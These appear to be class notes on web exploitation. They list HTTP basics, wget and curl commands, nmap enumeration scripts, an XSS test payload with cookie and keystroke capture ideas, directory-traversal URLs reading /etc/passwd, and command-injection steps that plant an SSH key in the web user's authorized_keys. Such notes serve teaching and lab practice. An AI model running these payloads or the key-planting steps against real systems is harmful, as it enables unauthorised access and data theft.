WEB EXPLOITATION

HTTP Response Codes
    10X == Informational
    2XX == Success
    30X == Redirection
    4XX == Client Error
    5XX == Server Erro

HTTP Fields
    User-Agent
    Referer
    Cookie
    Date
    Server
    Set-Cookie


GET request can be utilized to pass data to the server using the URL string:

https://www.columbiacountyga.gov/Home/Components/JobPosts/Job/1/1/something.php?var=hi
````````````````````````````````
Wget

wget -r -l2 -P /tmp ftp://ftpserver/
wget --save-cookies cookies.txt --keep-session-cookies --post-data 'user=1&password=2' https://website
wget --load-cookies cookies.txt -p https://website/interesting/article.php
------------------------------------------------------------------------------------------
curl -o stuff.html https://web.site/stuff.html
curl 'https://web.site/submit.php' -H 'Cookie: name=123; settings=1,2,3,4,5,6,7' --data 'name=Stan' | base64 -d > item.png

==========================================================================================

javascript allows websites to interact with client.

-----------------------------------------------------
Enumeration
(smb)proxychains nmap -Pn -T5 -sT -p 445 --script smb-os-discovery.nse
   HTTP proxychains nmap -Pn -T5 -sT -p 80 --script http-sql-injection.nse <IP>
   Robots.txt
    Legitimate surfing
    
    Tools:
        NSE scripts
        Nikto
        Burp suite (outside class)
  =============================================================================     
 
 XSS
   
   Insertion of arbitrary code into a webpage, that executes in the browser of visitors
    Unsanitized GET, POST, and PUT methods allow JS to be placed on websites
    Often found in forums that allow HTML

=================================================================================
<script>alert('XSS');</script>

    Capturing Cookies
    document.cookie
    Capturing Keystrokes
        bind keydown and keyup
    Capturing Sensitive Data
    document.body.innerHTM
--------------------------------------------------------------------------
   Directory Traversal
   example
   http://localhost:11935/books_pick.php?book=../../../../../../etc/passwd
   Ability to read/execute outside web server’s directory
    Uses ../../ (relative paths) in manipulating a server-side file path
view_image.php?file=../../etc/passwd

once on system cd /var/www/html/ for website backend
----------------------------------------------------------------

Command Injection
ssh-keygen -t rsa -b 4096
cat id_rsa.pub
find home dir (www)
cat /etc/passwd
:mkdir /var/www/.ssh
: ls -la /var/www/
copy entire public key 
:echo "pubkey" > /var/www/.ssh/authorized_keys
how to find what the home dir is 

ssh www-data@ip 
